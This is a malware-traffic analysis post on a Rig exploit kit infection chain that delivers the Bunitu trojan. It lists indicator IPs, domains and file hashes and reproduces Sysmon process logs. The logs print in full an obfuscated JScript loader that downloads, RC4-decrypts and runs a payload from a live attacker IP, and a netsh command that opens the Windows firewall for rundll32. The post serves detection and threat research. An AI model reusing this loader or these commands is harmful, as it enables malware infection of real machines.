Rig Exploit Kit delivers Bunitu Malware

Thanks to @david_jursa for sharing this information on the Rig EK

I have added a zipped pcap file for your analysis. The archive is password-protected; the password is `infected` (all lowercase). Handle the contents as live malware traffic — extract and replay only inside an isolated analysis environment.

PCAP file of the infection traffic:
2019-04-12-Rig-EK-pcap.zip

Reference: Revisiting The Bunitu Trojan

ASSOCIATED IPs AND DOMAINS:

78.47.1.197 – jblpulse3.org – Redirector to Rig EK
185.63.191.28 – Rig EK landing page and payload delivery
216.58.206.104 – Post-infection HTTPS connection from rundll32.exe (reverse DNS is lhr25s14-in-f8.1e100.net, which appears to be Google infrastructure — verify before treating this as attacker-controlled C2; it may be a connectivity check)
62.212.66.85 – Post-infection C2 (reverse DNS hosted-by.leaseweb.com)

DNS:
f.mashifoug.com – Post-infection DNS query
z.mashifoug.com – Post-infection DNS query

IMAGES AND DETAILS:

Shown above: Network traffic associated with the redirect to the Rig EK

 

Shown above: Rig EK URL traffic and post infection network

 

Shown above: Post infection DNS traffic

 


Shown above: the Bunitu DLL's persistence entry in the Windows registry

 

Sysmon logs showing the parent/child process chain and the DLL's network connections to the C2 servers. Detection points worth noting in the logs below: iexplore.exe spawns cmd.exe, which echoes a JScript loader into T.t in %tmp% and launches it with wscript //B //E:JScript; the loader downloads the payload over WinHTTP with the supplied User-Agent, only proceeds on an HTTP 200, decrypts it with what appears to be an RC4 routine keyed by the first script argument, checks the PE header's IMAGE_FILE_DLL flag to decide between a .exe (run via cmd) and a .dll (run via Regsvr32 /s), and then deletes its own script file — so T.t is unlikely to be recoverable from disk and the command-line logging is the primary artifact. The dropped executable also adds an inbound Windows Firewall allow rule for rundll32.exe via netsh, which is a high-signal detection on its own.

Image C:\Windows\System32\cmd.exe
CommandLine CMd.exe /q /c cd /d “%%tmp%%” && echo function Q(n,g){for(var c=0,s=String,d,D=”pus”+”h”,b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%%g[“len”+”gth”])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O=”fromC”,S=O+”harCode”;e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E=”WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGetTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s “,u=function(x){return E[“split”](“I”)[x]},J=ActiveXObject,W=function(v){return new J(v)};try{var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=1?[1,this[“WScript”]]:0;U=U[1],L=U[u(14)],v=u(9),m=U[“Ar”+”guments”];s.Type=2;c=q[u(8)]();s.Charset=u(012);s[“Open”]/**/();i=H(m);d=i[v](i[u(12)](“PE\x00\x00”)+027);s[“writetext”](i);if(037^<d){var z=1;c+=u(13)}else c+=p;K=”saveto”;s[K+”file”](c,2);s.Close();z^&^&(c=”Regsvr32″+p+u(18)+c);j.run(“cmd”+p+” /c “+c,0)}catch(DDDDD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+”.”+T+u(1));d[“SetProxy”](n);d[“Op”+”en”](u(2),g(1),n);d[“Option”](0)=g(2);d[“Send”];if(0310==d.status)return Q(d.responseText,g(n))};>T.t && stArt wsCripT //B //E:JScript T.t “dAAfg56yfsd” “http://185.63.191.28/?Mzc5ODc0&BQQqqus&cAeagCrgtb=detonator&uICZrVXv=perpetual&jBVZjuL=blackmail&t5zg34tg4=fsoLeMDPlGzhULULQNpzdpVAVoV_q3_20mAwUWZ0sKL-xaEUQ9G_JCcE7ELhR32_w&YFxqaQKcNhsN=already&qYNdRodS=strategy&aXZcQPWGil=difference&zLgjOUOUxBBY=known&rdHnKPzEcPDPSu=constitution&IlbasucBBm=constitution&zFHCcSPTPs=perpetual&lmRXCvxMOR=wrapped&feeAMSBa=constitution&AksuITWGFuI=detonator&NbniJtHsFIsX=constitution&ff54ds=wXnQMvXcJwDQAobGMvrESLtDNknQA0KK2If2_dqyEoH9c2nihNzUSkr16B2aCm2Ho&BbxTXuooRo=referred&XiXsmTFNTA4MTQy” “Mozilla/5.0 (Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko”
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
ParentCommandLine “C:\Program Files\Internet Explorer\iexplore.exe”

 

CommandLine wsCripT //B //E:JScript T.t “dAAfg56yfsd” “http://185.63.191.28/?Mzc5ODc0&BQQqqus&cAeagCrgtb=detonator&uICZrVXv=perpetual&jBVZjuL=blackmail&t5zg34tg4=fsoLeMDPlGzhULULQNpzdpVAVoV_q3_20mAwUWZ0sKL-xaEUQ9G_JCcE7ELhR32_w&YFxqaQKcNhsN=already&qYNdRodS=strategy&aXZcQPWGil=difference&zLgjOUOUxBBY=known&rdHnKPzEcPDPSu=constitution&IlbasucBBm=constitution&zFHCcSPTPs=perpetual&lmRXCvxMOR=wrapped&feeAMSBa=constitution&AksuITWGFuI=detonator&NbniJtHsFIsX=constitution&ff54ds=wXnQMvXcJwDQAobGMvrESLtDNknQA0KK2If2_dqyEoH9c2nihNzUSkr16B2aCm2Ho&BbxTXuooRo=referred&XiXsmTFNTA4MTQy”
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine CMd.exe /q /c cd /d “%tmp%” && echo function Q(n,g){for(var c=0,s=String,d,D=”pus”+”h”,b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g[“len”+”gth”])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O=”fromC”,S=O+”harCode”;e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E=”WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGetTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s “,u=function(x){return E[“split”](“I”)[x]},J=ActiveXObject,W=function(v){return new J(v)};try{var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=1?[1,this[“WScript”]]:0;U=U[1],L=U[u(14)],v=u(9),m=U[“Ar”+”guments”];s.Type=2;c=q[u(8)]();s.Charset=u(012);s[“Open”]/**/();i=H(m);d=i[v](i[u(12)](“PE\x00\x00”)+027);s[“writetext”](i);if(037^<d){var z=1;c+=u(13)}else c+=p;K=”saveto”;s[K+”file”](c,2);s.Close();z^&^&(c=”Regsvr32″+p+u(18)+c);j.run(“cmd”+p+” /c “+c,0)}catch(DDDDD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+”.”+T+u(1));d[“SetProxy”](n);d[“Op”+”en”](u(2),g(1),n);d[“Option”](0)=g(2);d[“Send”];if(0310==d.status)return Q(d.responseText,g(n))};>T.t && stArt wsCripT //B //E:JScript T.t “dAAfg56yfsd” “http://185.63.191.28/?Mzc5ODc0&BQQqqus&cAeagCrgtb=detonator&uICZrVXv=perpetual&jBVZjuL=blackmail&t5zg34tg4=fsoLeMDPlGzhULULQNpzdpVAVoV_q3_20mAwUWZ0sKL-xaEUQ9G_JCcE7ELhR32_w&YFxqaQKcNhsN=already&qYNdRodS=strategy&aXZcQPWGil=difference&zLgjOUOUxBBY=known&rdHnKPzEcPDPSu=constitution&IlbasucBBm=constitution&zFHCcSPTPs=perpetual&lmRXCvxMOR=wrapped&feeAMSBa=constitution&AksuITWGFuI=detonator&NbniJtHsFIsX=constitution&ff54ds=wXnQMvXcJwDQAobGMvrESLtDNknQA0KK2If2_dqyEoH9c2nihNzUSkr16B2aCm2Ho&BbxTXuooRo=referred&XiXsmTFNTA4MTQy” “Mozilla/5.0 (Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko”

 

Image C:\Windows\System32\cmd.exe
CommandLine “C:\Windows\System32\cmd.exe” /c rad93CC2.tmp.exe
CurrentDirectory C:\Users\Jack\AppData\Local\Temp\
ParentImage C:\Windows\System32\wscript.exe
ParentCommandLine wsCripT //B //E:JScript T.t “dAAfg56yfsd” “http://185.63.191.28/?Mzc5ODc0&BQQqqus&cAeagCrgtb=detonator&uICZrVXv=perpetual&jBVZjuL=blackmail&t5zg34tg4=fsoLeMDPlGzhULULQNpzdpVAVoV_q3_20mAwUWZ0sKL-xaEUQ9G_JCcE7ELhR32_w&YFxqaQKcNhsN=already&qYNdRodS=strategy&aXZcQPWGil=difference&zLgjOUOUxBBY=known&rdHnKPzEcPDPSu=constitution&IlbasucBBm=constitution&zFHCcSPTPs=perpetual&lmRXCvxMOR=wrapped&feeAMSBa=constitution&AksuITWGFuI=detonator&NbniJtHsFIsX=constitution&ff54ds=wXnQMvXcJwDQAobGMvrESLtDNknQA0KK2If2_dqyEoH9c2nihNzUSkr16B2aCm2Ho&BbxTXuooRo=referred&XiXsmTFNTA4MTQy” “Mozilla/5.0 (Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko”

 

Image C:\Users\Jack\AppData\Local\Temp\rad93CC2.tmp.exe
CommandLine rad93CC2.tmp.exe
CurrentDirectory C:\Users\Jack\AppData\Local\Temp\
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine “C:\Windows\System32\cmd.exe” /c rad93CC2.tmp.exe

 

Image C:\Windows\System32\rundll32.exe
CommandLine “C:\Windows\System32\rundll32.exe” “C:\Users\Jack\AppData\Local\miiwlon.dll”,miiwlon C:\Users\Jack\AppData\Local\Temp\rad93CC2.tmp.exe
CurrentDirectory C:\Users\Jack\AppData\Local\Temp\
ParentImage C:\Users\Jack\AppData\Local\Temp\rad93CC2.tmp.exe
ParentCommandLine rad93CC2.tmp.exe

 

Image C:\Windows\System32\netsh.exe
CommandLine “C:\Windows\System32\netsh.exe” advfirewall firewall add rule name=”Rundll32″ dir=in action=allow protocol=any program=”C:\Windows\system32\rundll32.exe”
CurrentDirectory C:\Windows\system32\
ParentImage C:\Users\Jack\AppData\Local\Temp\rad93CC2.tmp.exe
ParentCommandLine rad93CC2.tmp.exe

Image C:\Windows\System32\rundll32.exe
DestinationIp 216.58.206.104
DestinationHostname lhr25s14-in-f8.1e100.net
DestinationPort 443
DestinationPortName https

 

Image C:\Windows\System32\rundll32.exe
Protocol tcp
DestinationIp 62.212.66.85
DestinationHostname hosted-by.leaseweb.com
DestinationPort 443
DestinationPortName https

 

MALICIOUS PAYLOADS ASSOCIATED WITH RIG EK:

rad93CC2.tmp.exe – Initial payload (dropped into %tmp% by the Rig EK JScript loader)
File path: C:\Users\Jack\AppData\Local\Temp\rad93CC2.tmp.exe
SHA-256: a167ed97a4ffd9db4a1df9fc151a731b15154c3b20cbb0064f5bb96bd8a863cd
VirusTotal link

miiwlon.dll – Secondary payload (Bunitu DLL, loaded via rundll32.exe with export `miiwlon`)
Persistence / file path:
C:\Users\Jack\AppData\Local\miiwlon.dll
SHA-256:
723b1dc16c1513fc52e7c23f268e3f5e5c56560698d988d9eb51e4ea6c9b9fd4
VirusTotal link